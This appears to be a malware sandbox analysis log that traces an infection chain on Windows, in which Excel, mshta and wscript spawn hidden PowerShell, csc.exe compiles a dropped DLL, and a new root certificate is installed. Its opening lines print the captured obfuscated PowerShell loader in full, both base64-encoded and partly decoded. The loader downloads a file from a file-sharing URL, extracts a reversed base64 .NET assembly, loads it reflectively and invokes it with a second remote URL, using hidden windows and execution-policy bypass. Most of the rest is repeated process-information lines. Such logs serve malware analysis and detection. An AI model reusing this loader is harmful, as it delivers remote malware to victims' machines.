Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE899C022D push eax; iretd		5_2_000007FE899C0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE899C00BD pushad ; iretd		5_2_000007FE899C00C1

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
